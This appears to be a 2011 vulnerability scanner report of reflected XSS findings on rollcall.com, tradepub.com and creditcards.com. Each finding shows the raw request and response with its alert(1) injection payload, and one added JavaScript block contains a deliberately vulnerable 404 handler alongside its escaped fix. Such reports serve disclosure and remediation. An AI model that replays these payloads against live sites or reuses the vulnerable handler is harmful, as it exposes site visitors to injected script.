Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 01:14:07 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n22 ( iad-agg-n33), ms iad-agg-n33 ( origin)
P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Cache-Control: max-age=30
Expires: Sun, 13 Feb 2011 01:14:37 GMT
Age: 0
Content-Length: 282
Content-Type: text/html; charset=ISO-8859-1
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /media/js8da94<script>alert(1)</script>7219a2606ef/jquery.jtweetsanywhere-1.1.0.min.js was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 94a3e<script>alert(1)</script>ff051696785 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /media94a3e<script>alert(1)</script>ff051696785/js/jquery.min.js HTTP/1.1
Host: cdn.rollcall.com
Proxy-Connection: keep-alive
Referer: http://www.rollcall.com/news/-203351-1.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 01:14:00 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n22 ( iad-agg-n12), ms iad-agg-n12 ( origin)
P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Cache-Control: max-age=30
Expires: Sun, 13 Feb 2011 01:14:30 GMT
Age: 0
Content-Length: 260
Content-Type: text/html; charset=ISO-8859-1
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /media94a3e<script>alert(1)</script>ff051696785/js/jquery.min.js was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fb164<script>alert(1)</script>8f71f8a479d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /media/jsfb164<script>alert(1)</script>8f71f8a479d/jquery.min.js HTTP/1.1
Host: cdn.rollcall.com
Proxy-Connection: keep-alive
Referer: http://www.rollcall.com/news/-203351-1.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 01:14:00 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n22 ( iad-agg-n23), ms iad-agg-n23 ( origin)
P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Cache-Control: max-age=30
Expires: Sun, 13 Feb 2011 01:14:30 GMT
Age: 0
Content-Length: 260
Content-Type: text/html; charset=ISO-8859-1
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /media/jsfb164<script>alert(1)</script>8f71f8a479d/jquery.min.js was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b2a41<script>alert(1)</script>752ea324c3b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mediab2a41<script>alert(1)</script>752ea324c3b/js/slideshow.js HTTP/1.1
Host: cdn.rollcall.com
Proxy-Connection: keep-alive
Referer: http://www.rollcall.com/news/-203351-1.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3; __unam=b7417e3-12e1c93d720-72f506aa-1
Response
HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 01:14:11 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n22 ( iad-agg-n23), ms iad-agg-n23 ( origin)
P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Cache-Control: max-age=30
Expires: Sun, 13 Feb 2011 01:14:41 GMT
Age: 0
Content-Length: 259
Content-Type: text/html; charset=ISO-8859-1
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /mediab2a41<script>alert(1)</script>752ea324c3b/js/slideshow.js was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d149e<script>alert(1)</script>308c56d3ed6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /media/jsd149e<script>alert(1)</script>308c56d3ed6/slideshow.js HTTP/1.1
Host: cdn.rollcall.com
Proxy-Connection: keep-alive
Referer: http://www.rollcall.com/news/-203351-1.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3; __unam=b7417e3-12e1c93d720-72f506aa-1
Response
HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 01:14:11 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n22 ( iad-agg-n28), ms iad-agg-n28 ( origin)
P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Cache-Control: max-age=30
Expires: Sun, 13 Feb 2011 01:14:41 GMT
Age: 0
Content-Length: 259
Content-Type: text/html; charset=ISO-8859-1
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /media/jsd149e<script>alert(1)</script>308c56d3ed6/slideshow.js was not found on this server.</p> ...[SNIP]...
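The cdn.rollcall.com findings above all share one cause: the server's "Not Found" page copies the request path into the body as text between tags without encoding it. The following is an added example, not the origin server's code: a stand-in 404 handler that reproduces the vulnerable behaviour, the same handler with the path HTML-encoded for the text context, and the reflection check a scanner performs to confirm a finding. The 404 template wording and the probe string are constructed to match the report's requests; the handler names are assumptions for illustration.

```javascript
// Added example: reflected XSS in a 404 page, its fix, and the scanner's check.
// Stand-in for the origin's "Not Found" handler (assumption), not its real code.

// Encode for an HTML text node. These five characters are the ones that can
// start a tag, an entity, or close a quoted attribute value.
function htmlEscape(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// The 404 template: whatever is passed in is interpolated verbatim, so the
// caller is responsible for encoding it for this (HTML text) context.
function renderNotFound(pathText) {
  return '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n' +
    "<html><head><title>404 Not Found</title></head><body>\n" +
    "<h1>Not Found</h1>\n" +
    "<p>The requested URL " + pathText + " was not found on this server.</p>\n" +
    "</body></html>\n";
}

// Vulnerable: the raw request path goes straight into the template.
function notFoundVulnerable(path) {
  return renderNotFound(path);
}

// Hardened: encode the path for the context it lands in before interpolating.
function notFoundSafe(path) {
  return renderNotFound(htmlEscape(path));
}

// Scanner-style check. The random prefix and suffix around <script>alert(1)</script>
// let the scanner tell its own probe apart from anything already on the page, so
// "echoed unmodified" means the exact probe string appears in the response body.
function reflectedUnmodified(body, payload) {
  return body.includes(payload);
}

// Constructed probe in the shape of the report's requests (not captured traffic).
const PAYLOAD = "ec947<script>alert(1)</script>1823adaae09";
const PATH = "/css" + PAYLOAD + "/text.css";

// Returns the scanner's verdict for both handlers.
function demo() {
  return {
    vulnerable: reflectedUnmodified(notFoundVulnerable(PATH), PAYLOAD), // true
    hardened: reflectedUnmodified(notFoundSafe(PATH), PAYLOAD),         // false
  };
}
```

Two points worth noting from the captured responses. First, although every probed URL is a CSS or JavaScript asset, the 404 is returned with Content-Type: text/html, so a browser sent to one of these URLs will parse the reflected path as markup and run the script in the cdn.rollcall.com origin. Second, HTML entity encoding is specific to the HTML text and attribute contexts; it is not sufficient for input that is written into a JavaScript string, as the findings that follow demonstrate.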
The value of the ptnr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb70c\'%3balert(1)//8edcf55a37 was submitted in the ptnr parameter. This input was echoed as bb70c\\';alert(1)//8edcf55a37 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes; this backslash escaping must be applied before the quotation-mark escaping, otherwise the backslashes added to escape the quotation marks are themselves doubled and the quotation marks become unescaped again.
Request
GET /cts4/?ptnr=nasdaqbb70c\'%3balert(1)//8edcf55a37&tm=p_cnd02nas&cat=Fi&type=all&key=&trk= HTTP/1.1
Host: cts.tradepub.com
Proxy-Connection: keep-alive
Referer: http://www.nasdaq.com/aspx/market-headlines.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Sun, 13 Feb 2011 01:53:24 GMT
Server: Apache/1.3.27 (Unix) mod_perl/1.27
Content-Type: text/html
Cache-Control: private
Content-Length: 2139
The value of the cobrandPage request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a838\"%3balert(1)//16fba14f96c was submitted in the cobrandPage parameter. This input was echoed as 6a838\\";alert(1)//16fba14f96c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /imps_widget_node.php?aid=32392dee&num_rates=&show_logo=0&medium=js&widget=historical_rate_Table&cobrandPage=http://www.nasdaq.com/aspx/lowinterestcc.stm6a838\"%3balert(1)//16fba14f96c&ext_win=0 HTTP/1.1
Host: imps.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.nasdaq.com/investing/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Sun, 13 Feb 2011 02:16:48 GMT
Server: Apache
Content-Type: text/html
Content-Length: 13498
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload e16a0<script>alert(1)</script>cc6385526d was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.